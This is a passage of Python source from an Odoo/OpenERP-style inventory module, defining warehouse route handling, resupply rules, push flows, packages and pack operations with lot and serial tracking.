'crossdock': (_('Cross-Dock'), [(warehouse.wh_input_stock_loc_id, warehouse.wh_output_stock_loc_id, warehouse.int_type_id.id), (warehouse.wh_output_stock_loc_id, customer_loc, warehouse.out_type_id.id)]),
'ship_only': (_('Ship Only'), [(warehouse.lot_stock_id, customer_loc, warehouse.out_type_id.id)]),
'pick_ship': (_('Pick + Ship'), [(warehouse.lot_stock_id, warehouse.wh_output_stock_loc_id, warehouse.pick_type_id.id), (warehouse.wh_output_stock_loc_id, customer_loc, warehouse.out_type_id.id)]),
'pick_pack_ship': (_('Pick + Pack + Ship'), [(warehouse.lot_stock_id, warehouse.wh_pack_stock_loc_id, warehouse.pick_type_id.id), (warehouse.wh_pack_stock_loc_id, warehouse.wh_output_stock_loc_id, warehouse.pack_type_id.id), (warehouse.wh_output_stock_loc_id, customer_loc, warehouse.out_type_id.id)]),
}
def _handle_renaming(self, cr, uid, warehouse, name, code, context=None):
location_obj = self.pool.get('stock.location')
route_obj = self.pool.get('stock.location.route')
pull_obj = self.pool.get('procurement.rule')
push_obj = self.pool.get('stock.location.path')
#rename location
location_id = warehouse.lot_stock_id.location_id.id
location_obj.write(cr, uid, location_id, {'name': code}, context=context)
#rename route and push-procurement rules
for route in warehouse.route_ids:
route_obj.write(cr, uid, route.id, {'name': route.name.replace(warehouse.name, name, 1)}, context=context)
for pull in route.pull_ids:
pull_obj.write(cr, uid, pull.id, {'name': pull.name.replace(warehouse.name, name, 1)}, context=context)
for push in route.push_ids:
push_obj.write(cr, uid, push.id, {'name': push.name.replace(warehouse.name, name, 1)}, context=context)
#change the mto procurement rule name
if warehouse.mto_pull_id.id:
pull_obj.write(cr, uid, warehouse.mto_pull_id.id, {'name': warehouse.mto_pull_id.name.replace(warehouse.name, name, 1)}, context=context)
def _check_delivery_resupply(self, cr, uid, warehouse, new_location, change_to_multiple, context=None):
""" Will check if the resupply routes from this warehouse follow the changes of number of delivery steps """
#Check routes that are being delivered by this warehouse and change the rule going to transit location
route_obj = self.pool.get("stock.location.route")
pull_obj = self.pool.get("procurement.rule")
routes = route_obj.search(cr, uid, [('supplier_wh_id','=', warehouse.id)], context=context)
pulls = pull_obj.search(cr, uid, ['&', ('route_id', 'in', routes), ('location_id.usage', '=', 'transit')], context=context)
if pulls:
pull_obj.write(cr, uid, pulls, {'location_src_id': new_location, 'procure_method': change_to_multiple and "make_to_order" or "make_to_stock"}, context=context)
# Create or clean MTO rules
mto_route_id = self._get_mto_route(cr, uid, context=context)
if not change_to_multiple:
# If single delivery we should create the necessary MTO rules for the resupply
# pulls = pull_obj.search(cr, uid, ['&', ('route_id', '=', mto_route_id), ('location_id.usage', '=', 'transit'), ('location_src_id', '=', warehouse.lot_stock_id.id)], context=context)
pull_recs = pull_obj.browse(cr, uid, pulls, context=context)
transfer_locs = list(set([x.location_id for x in pull_recs]))
vals = [(warehouse.lot_stock_id , x, warehouse.out_type_id.id) for x in transfer_locs]
mto_pull_vals = self._get_mto_pull_rule(cr, uid, warehouse, vals, context=context)
for mto_pull_val in mto_pull_vals:
pull_obj.create(cr, uid, mto_pull_val, context=context)
else:
# We need to delete all the MTO procurement rules, otherwise they risk to be used in the system
pulls = pull_obj.search(cr, uid, ['&', ('route_id', '=', mto_route_id), ('location_id.usage', '=', 'transit'), ('location_src_id', '=', warehouse.lot_stock_id.id)], context=context)
if pulls:
pull_obj.unlink(cr, uid, pulls, context=context)
def _check_reception_resupply(self, cr, uid, warehouse, new_location, context=None):
"""
Will check if the resupply routes to this warehouse follow the changes of number of receipt steps
"""
#Check routes that are being delivered by this warehouse and change the rule coming from transit location
route_obj = self.pool.get("stock.location.route")
pull_obj = self.pool.get("procurement.rule")
routes = route_obj.search(cr, uid, [('supplied_wh_id','=', warehouse.id)], context=context)
pulls= pull_obj.search(cr, uid, ['&', ('route_id', 'in', routes), ('location_src_id.usage', '=', 'transit')])
if pulls:
pull_obj.write(cr, uid, pulls, {'location_id': new_location}, context=context)
def _check_resupply(self, cr, uid, warehouse, reception_new, delivery_new, context=None):
if reception_new:
old_val = warehouse.reception_steps
new_val = reception_new
change_to_one = (old_val != 'one_step' and new_val == 'one_step')
change_to_multiple = (old_val == 'one_step' and new_val != 'one_step')
if change_to_one or change_to_multiple:
new_location = change_to_one and warehouse.lot_stock_id.id or warehouse.wh_input_stock_loc_id.id
self._check_reception_resupply(cr, uid, warehouse, new_location, context=context)
if delivery_new:
old_val = warehouse.delivery_steps
new_val = delivery_new
change_to_one = (old_val != 'ship_only' and new_val == 'ship_only')
change_to_multiple = (old_val == 'ship_only' and new_val != 'ship_only')
if change_to_one or change_to_multiple:
new_location = change_to_one and warehouse.lot_stock_id.id or warehouse.wh_output_stock_loc_id.id
self._check_delivery_resupply(cr, uid, warehouse, new_location, change_to_multiple, context=context)
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
seq_obj = self.pool.get('ir.sequence')
route_obj = self.pool.get('stock.location.route')
context_with_inactive = context.copy()
context_with_inactive['active_test'] = False
for warehouse in self.browse(cr, uid, ids, context=context_with_inactive):
#first of all, check if we need to delete and recreate route
if vals.get('reception_steps') or vals.get('delivery_steps'):
#activate and deactivate location according to reception and delivery option
self.switch_location(cr, uid, warehouse.id, warehouse, vals.get('reception_steps', False), vals.get('delivery_steps', False), context=context)
# switch between route
self.change_route(cr, uid, ids, warehouse, vals.get('reception_steps', False), vals.get('delivery_steps', False), context=context_with_inactive)
# Check if we need to change something to resupply warehouses and associated MTO rules
self._check_resupply(cr, uid, warehouse, vals.get('reception_steps'), vals.get('delivery_steps'), context=context)
if vals.get('code') or vals.get('name'):
name = warehouse.name
#rename sequence
if vals.get('name'):
name = vals.get('name', warehouse.name)
self._handle_renaming(cr, uid, warehouse, name, vals.get('code', warehouse.code), context=context_with_inactive)
if warehouse.in_type_id:
seq_obj.write(cr, uid, warehouse.in_type_id.sequence_id.id, {'name': name + _(' Sequence in'), 'prefix': vals.get('code', warehouse.code) + '/IN/'}, context=context)
if warehouse.out_type_id:
seq_obj.write(cr, uid, warehouse.out_type_id.sequence_id.id, {'name': name + _(' Sequence out'), 'prefix': vals.get('code', warehouse.code) + '/OUT/'}, context=context)
if warehouse.pack_type_id:
seq_obj.write(cr, uid, warehouse.pack_type_id.sequence_id.id, {'name': name + _(' Sequence packing'), 'prefix': vals.get('code', warehouse.code) + '/PACK/'}, context=context)
if warehouse.pick_type_id:
seq_obj.write(cr, uid, warehouse.pick_type_id.sequence_id.id, {'name': name + _(' Sequence picking'), 'prefix': vals.get('code', warehouse.code) + '/PICK/'}, context=context)
if warehouse.int_type_id:
seq_obj.write(cr, uid, warehouse.int_type_id.sequence_id.id, {'name': name + _(' Sequence internal'), 'prefix': vals.get('code', warehouse.code) + '/INT/'}, context=context)
if vals.get('resupply_wh_ids') and not vals.get('resupply_route_ids'):
for cmd in vals.get('resupply_wh_ids'):
if cmd[0] == 6:
new_ids = set(cmd[2])
old_ids = set([wh.id for wh in warehouse.resupply_wh_ids])
to_add_wh_ids = new_ids - old_ids
if to_add_wh_ids:
supplier_warehouses = self.browse(cr, uid, list(to_add_wh_ids), context=context)
self._create_resupply_routes(cr, uid, warehouse, supplier_warehouses, warehouse.default_resupply_wh_id, context=context)
to_remove_wh_ids = old_ids - new_ids
if to_remove_wh_ids:
to_remove_route_ids = route_obj.search(cr, uid, [('supplied_wh_id', '=', warehouse.id), ('supplier_wh_id', 'in', list(to_remove_wh_ids))], context=context)
if to_remove_route_ids:
route_obj.unlink(cr, uid, to_remove_route_ids, context=context)
else:
#not implemented
pass
if 'default_resupply_wh_id' in vals:
if vals.get('default_resupply_wh_id') == warehouse.id:
raise UserError(_('The default resupply warehouse should be different than the warehouse itself!'))
if warehouse.default_resupply_wh_id:
#remove the existing resupplying route on the warehouse
to_remove_route_ids = route_obj.search(cr, uid, [('supplied_wh_id', '=', warehouse.id), ('supplier_wh_id', '=', warehouse.default_resupply_wh_id.id)], context=context)
for inter_wh_route_id in to_remove_route_ids:
self.write(cr, uid, [warehouse.id], {'route_ids': [(3, inter_wh_route_id)]})
if vals.get('default_resupply_wh_id'):
#assign the new resupplying route on all products
to_assign_route_ids = route_obj.search(cr, uid, [('supplied_wh_id', '=', warehouse.id), ('supplier_wh_id', '=', vals.get('default_resupply_wh_id'))], context=context)
for inter_wh_route_id in to_assign_route_ids:
self.write(cr, uid, [warehouse.id], {'route_ids': [(4, inter_wh_route_id)]})
# If another partner assigned
if vals.get('partner_id'):
if not vals.get('company_id'):
company = self.browse(cr, uid, ids[0], context=context).company_id
else:
company = self.pool['res.company'].browse(cr, uid, vals['company_id'])
transit_loc = company.internal_transit_location_id.id
self.pool['res.partner'].write(cr, uid, [vals['partner_id']], {'property_stock_customer': transit_loc,
'property_stock_supplier': transit_loc}, context=context)
return super(stock_warehouse, self).write(cr, uid, ids, vals=vals, context=context)
def get_all_routes_for_wh(self, cr, uid, warehouse, context=None):
route_obj = self.pool.get("stock.location.route")
all_routes = [route.id for route in warehouse.route_ids]
all_routes += route_obj.search(cr, uid, [('supplied_wh_id', '=', warehouse.id)], context=context)
all_routes += [warehouse.mto_pull_id.route_id.id]
return all_routes
def view_all_routes_for_wh(self, cr, uid, ids, context=None):
all_routes = []
for wh in self.browse(cr, uid, ids, context=context):
all_routes += self.get_all_routes_for_wh(cr, uid, wh, context=context)
domain = [('id', 'in', all_routes)]
return {
'name': _('Warehouse\'s Routes'),
'domain': domain,
'res_model': 'stock.location.route',
'type': 'ir.actions.act_window',
'view_id': False,
'view_mode': 'tree,form',
'view_type': 'form',
'limit': 20
}
class stock_location_path(osv.osv):
_name = "stock.location.path"
_description = "Pushed Flows"
_order = "name"
def _get_rules(self, cr, uid, ids, context=None):
res = []
for route in self.browse(cr, uid, ids, context=context):
res += [x.id for x in route.push_ids]
return res
_columns = {
'name': fields.char('Operation Name', required=True),
'company_id': fields.many2one('res.company', 'Company'),
'route_id': fields.many2one('stock.location.route', 'Route'),
'location_from_id': fields.many2one('stock.location', 'Source Location', ondelete='cascade', select=1, required=True,
help="This rule can be applied when a move is confirmed that has this location as destination location"),
'location_dest_id': fields.many2one('stock.location', 'Destination Location', ondelete='cascade', select=1, required=True,
help="The new location where the goods need to go"),
'delay': fields.integer('Delay (days)', help="Number of days needed to transfer the goods"),
'picking_type_id': fields.many2one('stock.picking.type', 'Picking Type', required=True,
help="This is the picking type that will be put on the stock moves"),
'auto': fields.selection(
[('auto','Automatic Move'), ('manual','Manual Operation'),('transparent','Automatic No Step Added')],
'Automatic Move',
required=True, select=1,
help="The 'Automatic Move' / 'Manual Operation' value will create a stock move after the current one. " \
"With 'Automatic No Step Added', the location is replaced in the original move."
),
'propagate': fields.boolean('Propagate cancel and split', help='If checked, when the previous move is cancelled or split, the move generated by this move will too'),
'active': fields.boolean('Active'),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse'),
'route_sequence': fields.related('route_id', 'sequence', string='Route Sequence',
store={
'stock.location.route': (_get_rules, ['sequence'], 10),
'stock.location.path': (lambda self, cr, uid, ids, c={}: ids, ['route_id'], 10),
}),
'sequence': fields.integer('Sequence'),
}
_defaults = {
'auto': 'auto',
'delay': 0,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'procurement.order', context=c),
'propagate': True,
'active': True,
}
def _prepare_push_apply(self, cr, uid, rule, move, context=None):
newdate = (datetime.strptime(move.date_expected, DEFAULT_SERVER_DATETIME_FORMAT) + relativedelta.relativedelta(days=rule.delay or 0)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return {
'origin': move.origin or move.picking_id.name or "/",
'location_id': move.location_dest_id.id,
'location_dest_id': rule.location_dest_id.id,
'date': newdate,
'company_id': rule.company_id and rule.company_id.id or False,
'date_expected': newdate,
'picking_id': False,
'picking_type_id': rule.picking_type_id and rule.picking_type_id.id or False,
'propagate': rule.propagate,
'push_rule_id': rule.id,
'warehouse_id': rule.warehouse_id and rule.warehouse_id.id or False,
'procurement_id': False,
}
def _apply(self, cr, uid, rule, move, context=None):
move_obj = self.pool.get('stock.move')
newdate = (datetime.strptime(move.date_expected, DEFAULT_SERVER_DATETIME_FORMAT) + relativedelta.relativedelta(days=rule.delay or 0)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
if rule.auto == 'transparent':
old_dest_location = move.location_dest_id.id
move_obj.write(cr, uid, [move.id], {
'date': newdate,
'date_expected': newdate,
'location_dest_id': rule.location_dest_id.id
})
#avoid looping if a push rule is not well configured
if rule.location_dest_id.id != old_dest_location:
#call again push_apply to see if a next step is defined
move_obj._push_apply(cr, uid, [move], context=context)
else:
vals = self._prepare_push_apply(cr, uid, rule, move, context=context)
move_id = move_obj.copy(cr, uid, move.id, vals, context=context)
move_obj.write(cr, uid, [move.id], {
'move_dest_id': move_id,
})
move_obj.action_confirm(cr, uid, [move_id], context=None)
# -------------------------
# Packaging related stuff
# -------------------------
from openerp.report import report_sxw
class stock_package(osv.osv):
"""
These are the packages, containing quants and/or other packages
"""
_name = "stock.quant.package"
_description = "Physical Packages"
_parent_name = "parent_id"
_parent_store = True
_parent_order = 'name'
_order = 'parent_left'
def name_get(self, cr, uid, ids, context=None):
res = self._complete_name(cr, uid, ids, 'complete_name', None, context=context)
return res.items()
def _complete_name(self, cr, uid, ids, name, args, context=None):
""" Forms complete name of location from parent location to child location.
@return: Dictionary of values
"""
res = {}
for m in self.browse(cr, uid, ids, context=context):
res[m.id] = m.name
parent = m.parent_id
while parent:
res[m.id] = parent.name + ' / ' + res[m.id]
parent = parent.parent_id
return res
def _get_packages(self, cr, uid, ids, context=None):
"""Returns packages from quants for store"""
res = set()
for quant in self.browse(cr, uid, ids, context=context):
pack = quant.package_id
while pack:
res.add(pack.id)
pack = pack.parent_id
return list(res)
def _get_package_info(self, cr, uid, ids, name, args, context=None):
quant_obj = self.pool.get("stock.quant")
default_company_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.id
res = dict((res_id, {'location_id': False, 'company_id': default_company_id, 'owner_id': False}) for res_id in ids)
for pack in self.browse(cr, uid, ids, context=context):
quants = quant_obj.search(cr, uid, [('package_id', 'child_of', pack.id)], context=context)
if quants:
quant = quant_obj.browse(cr, uid, quants[0], context=context)
res[pack.id]['location_id'] = quant.location_id.id
res[pack.id]['owner_id'] = quant.owner_id.id
res[pack.id]['company_id'] = quant.company_id.id
else:
res[pack.id]['location_id'] = False
res[pack.id]['owner_id'] = False
res[pack.id]['company_id'] = False
return res
def _get_packages_to_relocate(self, cr, uid, ids, context=None):
res = set()
for pack in self.browse(cr, uid, ids, context=context):
res.add(pack.id)
if pack.parent_id:
res.add(pack.parent_id.id)
return list(res)
_columns = {
'name': fields.char('Package Reference', select=True, copy=False),
'complete_name': fields.function(_complete_name, type='char', string="Package Name",),
'parent_left': fields.integer('Left Parent', select=1),
'parent_right': fields.integer('Right Parent', select=1),
'packaging_id': fields.many2one('product.packaging', 'Packaging', help="This field should be completed only if everything inside the package share the same product, otherwise it doesn't really makes sense.", select=True),
'location_id': fields.function(_get_package_info, type='many2one', relation='stock.location', string='Location', multi="package",
store={
'stock.quant': (_get_packages, ['location_id'], 10),
'stock.quant.package': (_get_packages_to_relocate, ['quant_ids', 'children_ids', 'parent_id'], 10),
}, readonly=True, select=True),
'quant_ids': fields.one2many('stock.quant', 'package_id', 'Bulk Content', readonly=True),
'parent_id': fields.many2one('stock.quant.package', 'Parent Package', help="The package containing this item", ondelete='restrict', readonly=True),
'children_ids': fields.one2many('stock.quant.package', 'parent_id', 'Contained Packages', readonly=True),
'company_id': fields.function(_get_package_info, type="many2one", relation='res.company', string='Company', multi="package",
store={
'stock.quant': (_get_packages, ['company_id'], 10),
'stock.quant.package': (_get_packages_to_relocate, ['quant_ids', 'children_ids', 'parent_id'], 10),
}, readonly=True, select=True),
'owner_id': fields.function(_get_package_info, type='many2one', relation='res.partner', string='Owner', multi="package",
store={
'stock.quant': (_get_packages, ['owner_id'], 10),
'stock.quant.package': (_get_packages_to_relocate, ['quant_ids', 'children_ids', 'parent_id'], 10),
}, readonly=True, select=True),
}
_defaults = {
'name': lambda self, cr, uid, context: self.pool.get('ir.sequence').next_by_code(cr, uid, 'stock.quant.package') or _('Unknown Pack')
}
def _check_location_constraint(self, cr, uid, packs, context=None):
'''checks that all quants in a package are stored in the same location. This function cannot be used
as a constraint because it needs to be checked on pack operations (they may not call write on the
package)
'''
quant_obj = self.pool.get('stock.quant')
for pack in packs:
parent = pack
while parent.parent_id:
parent = parent.parent_id
quant_ids = self.get_content(cr, uid, [parent.id], context=context)
quants = [x for x in quant_obj.browse(cr, uid, quant_ids, context=context) if x.qty > 0]
location_id = quants and quants[0].location_id.id or False
if not [quant.location_id.id == location_id for quant in quants]:
raise UserError(_('Everything inside a package should be in the same location'))
return True
def action_print(self, cr, uid, ids, context=None):
context = dict(context or {}, active_ids=ids)
return self.pool.get("report").get_action(cr, uid, ids, 'stock.report_package_barcode_small', context=context)
def unpack(self, cr, uid, ids, context=None):
quant_obj = self.pool.get('stock.quant')
for package in self.browse(cr, uid, ids, context=context):
quant_ids = [quant.id for quant in package.quant_ids]
quant_obj.write(cr, SUPERUSER_ID, quant_ids, {'package_id': package.parent_id.id or False}, context=context)
children_package_ids = [child_package.id for child_package in package.children_ids]
self.write(cr, uid, children_package_ids, {'parent_id': package.parent_id.id or False}, context=context)
return self.pool.get('ir.actions.act_window').for_xml_id(cr, uid, 'stock', 'action_package_view', context=context)
def get_content(self, cr, uid, ids, context=None):
child_package_ids = self.search(cr, uid, [('id', 'child_of', ids)], context=context)
return self.pool.get('stock.quant').search(cr, uid, [('package_id', 'in', child_package_ids)], context=context)
def get_content_package(self, cr, uid, ids, context=None):
quants_ids = self.get_content(cr, uid, ids, context=context)
res = self.pool.get('ir.actions.act_window').for_xml_id(cr, uid, 'stock', 'quantsact', context=context)
res['domain'] = [('id', 'in', quants_ids)]
return res
def _get_product_total_qty(self, cr, uid, package_record, product_id, context=None):
''' find the total of given product 'product_id' inside the given package 'package_id'''
quant_obj = self.pool.get('stock.quant')
all_quant_ids = self.get_content(cr, uid, [package_record.id], context=context)
total = 0
for quant in quant_obj.browse(cr, uid, all_quant_ids, context=context):
if quant.product_id.id == product_id:
total += quant.qty
return total
def _get_all_products_quantities(self, cr, uid, package_id, context=None):
'''This function computes the different product quantities for the given package
'''
quant_obj = self.pool.get('stock.quant')
res = {}
for quant in quant_obj.browse(cr, uid, self.get_content(cr, uid, package_id, context=context)):
if quant.product_id not in res:
res[quant.product_id] = 0
res[quant.product_id] += quant.qty
return res
#Remove me?
def copy_pack(self, cr, uid, id, default_pack_values=None, default=None, context=None):
stock_pack_operation_obj = self.pool.get('stock.pack.operation')
if default is None:
default = {}
new_package_id = self.copy(cr, uid, id, default_pack_values, context=context)
default['result_package_id'] = new_package_id
op_ids = stock_pack_operation_obj.search(cr, uid, [('result_package_id', '=', id)], context=context)
for op_id in op_ids:
stock_pack_operation_obj.copy(cr, uid, op_id, default, context=context)
class stock_pack_operation(osv.osv):
_name = "stock.pack.operation"
_description = "Packing Operation"
_order = "result_package_id desc, id"
def _get_remaining_prod_quantities(self, cr, uid, operation, context=None):
'''Get the remaining quantities per product on an operation with a package. This function returns a dictionary'''
#if the operation doesn't concern a package, it's not relevant to call this function
if not operation.package_id or operation.product_id:
return {operation.product_id: operation.remaining_qty}
#get the total of products the package contains
res = self.pool.get('stock.quant.package')._get_all_products_quantities(cr, uid, operation.package_id.id, context=context)
#reduce by the quantities linked to a move
for record in operation.linked_move_operation_ids:
if record.move_id.product_id.id not in res:
res[record.move_id.product_id] = 0
res[record.move_id.product_id] -= record.qty
return res
def _get_remaining_qty(self, cr, uid, ids, name, args, context=None):
uom_obj = self.pool.get('product.uom')
res = {}
for ops in self.browse(cr, uid, ids, context=context):
res[ops.id] = 0
if ops.package_id and not ops.product_id:
#dont try to compute the remaining quantity for packages because it's not relevant (a package could include different products).
#should use _get_remaining_prod_quantities instead
continue
else:
qty = ops.product_qty
if ops.product_uom_id:
qty = uom_obj._compute_qty_obj(cr, uid, ops.product_uom_id, ops.product_qty, ops.product_id.uom_id, context=context)
for record in ops.linked_move_operation_ids:
qty -= record.qty
res[ops.id] = float_round(qty, precision_rounding=ops.product_id.uom_id.rounding)
return res
def product_id_change(self, cr, uid, ids, product_id, product_uom_id, product_qty, context=None):
res = self.on_change_tests(cr, uid, ids, product_id, product_uom_id, product_qty, context=context)
uom_obj = self.pool['product.uom']
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
if product_id and not product_uom_id or uom_obj.browse(cr, uid, product_uom_id, context=context).category_id.id != product.uom_id.category_id.id:
res['value']['product_uom_id'] = product.uom_id.id
if product:
res['value']['lots_visible'] = (product.tracking != 'none')
res['domain'] = {'product_uom_id': [('category_id','=',product.uom_id.category_id.id)]}
else:
res['domain'] = {'product_uom_id': []}
return res
def on_change_tests(self, cr, uid, ids, product_id, product_uom_id, product_qty, context=None):
res = {'value': {}}
uom_obj = self.pool.get('product.uom')
if product_id:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
product_uom_id = product_uom_id or product.uom_id.id
selected_uom = uom_obj.browse(cr, uid, product_uom_id, context=context)
if selected_uom.category_id.id != product.uom_id.category_id.id:
res['warning'] = {
'title': _('Warning: wrong UoM!'),
'message': _('The selected UoM for product %s is not compatible with the UoM set on the product form. \nPlease choose an UoM within the same UoM category.') % (product.name)
}
if product_qty and 'warning' not in res:
rounded_qty = uom_obj._compute_qty(cr, uid, product_uom_id, product_qty, product_uom_id, round=True)
if rounded_qty != product_qty:
res['warning'] = {
'title': _('Warning: wrong quantity!'),
'message': _('The chosen quantity for product %s is not compatible with the UoM rounding. It will be automatically converted at confirmation') % (product.name)
}
return res
def _compute_location_description(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for op in self.browse(cr, uid, ids, context=context):
from_name = op.location_id.name
to_name = op.location_dest_id.name
if op.package_id and op.product_id:
from_name += " : " + op.package_id.name
if op.result_package_id:
to_name += " : " + op.result_package_id.name
res[op.id] = {'from_loc': from_name,
'to_loc': to_name}
return res
def _get_bool(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for pack in self.browse(cr, uid, ids, context=context):
res[pack.id] = (pack.qty_done > 0.0)
return res
def _set_processed_qty(self, cr, uid, id, field_name, field_value, arg, context=None):
op = self.browse(cr, uid, id, context=context)
if not op.product_id:
if field_value and op.qty_done == 0:
self.write(cr, uid, [id], {'qty_done': 1.0}, context=context)
if not field_value and op.qty_done != 0:
self.write(cr, uid, [id], {'qty_done': 0.0}, context=context)
return True
def _compute_lots_visible(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for pack in self.browse(cr, uid, ids, context=context):
if pack.pack_lot_ids:
res[pack.id] = True
continue
pick = pack.picking_id
product_requires = (pack.product_id.tracking != 'none')
if pick.picking_type_id:
res[pack.id] = (pick.picking_type_id.use_existing_lots or pick.picking_type_id.use_create_lots) and product_requires
else:
res[pack.id] = product_requires
return res
def _get_default_from_loc(self, cr, uid, context=None):
default_loc = context.get('default_location_id')
if default_loc:
return self.pool['stock.location'].browse(cr, uid, default_loc, context=context).name
def _get_default_to_loc(self, cr, uid, context=None):
default_loc = context.get('default_location_dest_id')
if default_loc:
return self.pool['stock.location'].browse(cr, uid, default_loc, context=context).name
_columns = {
'picking_id': fields.many2one('stock.picking', 'Stock Picking', help='The stock operation where the packing has been made', required=True),
'product_id': fields.many2one('product.product', 'Product', ondelete="CASCADE"), # 1
'product_uom_id': fields.many2one('product.uom', 'Unit of Measure'),
'product_qty': fields.float('To Do', digits_compute=dp.get_precision('Product Unit of Measure'), required=True),
'qty_done': fields.float('Done', digits_compute=dp.get_precision('Product Unit of Measure')),
'processed_boolean': fields.function(_get_bool, fnct_inv=_set_processed_qty, type='boolean', string='Done'),
'package_id': fields.many2one('stock.quant.package', 'Source Package'), # 2
'pack_lot_ids': fields.one2many('stock.pack.operation.lot', 'operation_id', 'Lots Used'),
'result_package_id': fields.many2one('stock.quant.package', 'Destination Package', help="If set, the operations are packed into this package", required=False, ondelete='cascade'),
'date': fields.datetime('Date', required=True),
'owner_id': fields.many2one('res.partner', 'Owner', help="Owner of the quants"),
'linked_move_operation_ids': fields.one2many('stock.move.operation.link', 'operation_id', string='Linked Moves', readonly=True, help='Moves impacted by this operation for the computation of the remaining quantities'),
'remaining_qty': fields.function(_get_remaining_qty, type='float', digits = 0, string="Remaining Qty", help="Remaining quantity in default UoM according to moves matched with this operation. "),
'location_id': fields.many2one('stock.location', 'Source Location', required=True),
'location_dest_id': fields.many2one('stock.location', 'Destination Location', required=True),
'picking_source_location_id': fields.related('picking_id', 'location_id', type='many2one', relation='stock.location'),
'picking_destination_location_id': fields.related('picking_id', 'location_dest_id', type='many2one', relation='stock.location'),
'from_loc': fields.function(_compute_location_description, type='char', string='From', multi='loc'),
'to_loc': fields.function(_compute_location_description, type='char', string='To', multi='loc'),
'fresh_record': fields.boolean('Newly created pack operation'),
'lots_visible': fields.function(_compute_lots_visible, type='boolean'),
'state': fields.related('picking_id', 'state', type='selection', selection=[
('draft', 'Draft'),
('cancel', 'Cancelled'),
('waiting', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('partially_available', 'Partially Available'),
('assigned', 'Available'),
('done', 'Done'),
]),
}
_defaults = {
'date': fields.date.context_today,
'qty_done': 0.0,
'product_qty': 0.0,
'processed_boolean': lambda *a: False,
'fresh_record': True,
'from_loc': _get_default_from_loc,
'to_loc': _get_default_to_loc,
}
def split_quantities(self, cr, uid, ids, context=None):
for pack in self.browse(cr, uid, ids, context=context):
if pack.product_qty - pack.qty_done > 0.0 and pack.qty_done < pack.product_qty:
pack2 = self.copy(cr, uid, pack.id, default={'qty_done': 0.0, 'product_qty': pack.product_qty - pack.qty_done}, context=context)
self.write(cr, uid, [pack.id], {'product_qty': pack.qty_done}, context=context)
self._copy_remaining_pack_lot_ids(cr, uid, pack.id, pack2, context=context)
else:
raise UserError(_('The quantity to split should be smaller than the quantity To Do. '))
return True
def write(self, cr, uid, ids, vals, context=None):
vals['fresh_record'] = False
context = context or {}
res = super(stock_pack_operation, self).write(cr, uid, ids, vals, context=context)
return res
def unlink(self, cr, uid, ids, context=None):
if any([x.state in ('done', 'cancel') for x in self.browse(cr, uid, ids, context=context)]):
raise UserError(_('You can not delete pack operations of a done picking'))
return super(stock_pack_operation, self).unlink(cr, uid, ids, context=context)
def check_tracking(self, cr, uid, ids, context=None):
""" Checks if serial number is assigned to stock move or not and raise an error if it had to.
"""
operations = self.browse(cr, uid, ids, context=context)
for ops in operations:
if ops.picking_id and (ops.picking_id.picking_type_id.use_existing_lots or ops.picking_id.picking_type_id.use_create_lots) and \
ops.product_id and ops.product_id.tracking != 'none' and ops.qty_done > 0.0:
if not ops.pack_lot_ids:
raise UserError(_('You need to provide a Lot/Serial Number for product %s') % ops.product_id.name)
if ops.product_id.tracking == 'serial':
for opslot in ops.pack_lot_ids:
if opslot.qty not in (1.0, 0.0):
raise UserError(_('You should provide a different serial number for each piece'))
def save(self, cr, uid, ids, context=None):
for pack in self.browse(cr, uid, ids, context=context):
if pack.product_id.tracking != 'none':
qty_done = sum([x.qty for x in pack.pack_lot_ids])
self.pool['stock.pack.operation'].write(cr, uid, [pack.id], {'qty_done': qty_done}, context=context)
return {'type': 'ir.actions.act_window_close'}
def split_lot(self, cr, uid, ids, context=None):
context = context or {}
ctx=context.copy()
assert len(ids) > 0
data_obj = self.pool['ir.model.data']
pack = self.browse(cr, uid, ids[0], context=context)
picking_type = pack.picking_id.picking_type_id
serial = (pack.product_id.tracking == 'serial')
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_pack_operation_lot_form')
# If it's a returned stock move, we do not want to create a lot
returned_move = pack.linked_move_operation_ids.mapped('move_id').mapped('origin_returned_move_id')
only_create = picking_type.use_create_lots and not picking_type.use_existing_lots and not returned_move
show_reserved = any([x for x in pack.pack_lot_ids if x.qty_todo > 0.0])
ctx.update({'serial': serial,
'only_create': only_create,
'create_lots': picking_type.use_create_lots,
'state_done': pack.picking_id.state == 'done',
'show_reserved': show_reserved})
return {
'name': _('Lot Details'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.pack.operation',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': pack.id,
'context': ctx,
}
def show_details(self, cr, uid, ids, context=None):
data_obj = self.pool['ir.model.data']
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_pack_operation_details_form_save')
pack = self.browse(cr, uid, ids[0], context=context)
return {
'name': _('Operation Details'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.pack.operation',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': pack.id,
'context': context,
}
def _copy_remaining_pack_lot_ids(self, cr, uid, id, new_operation_id, context=None):
stock_pack_operation_lot_obj = self.pool["stock.pack.operation.lot"]
old_operation = self.browse(cr, uid, id, context=context)
for pack_lot_id in old_operation.pack_lot_ids:
new_qty_todo = pack_lot_id.qty_todo - pack_lot_id.qty
if float_compare(new_qty_todo, 0, precision_rounding=old_operation.product_uom_id.rounding) > 0:
stock_pack_operation_lot_obj.copy(cr, uid, pack_lot_id.id, {'operation_id': new_operation_id,
'qty_todo': new_qty_todo,
'qty': 0}, context=context)
class stock_pack_operation_lot(osv.osv):
_name = "stock.pack.operation.lot"
_description = "Specifies lot/serial number for pack operations that need it"
def _get_plus(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for packlot in self.browse(cr, uid, ids, context=context):
if packlot.operation_id.product_id.tracking == 'serial':
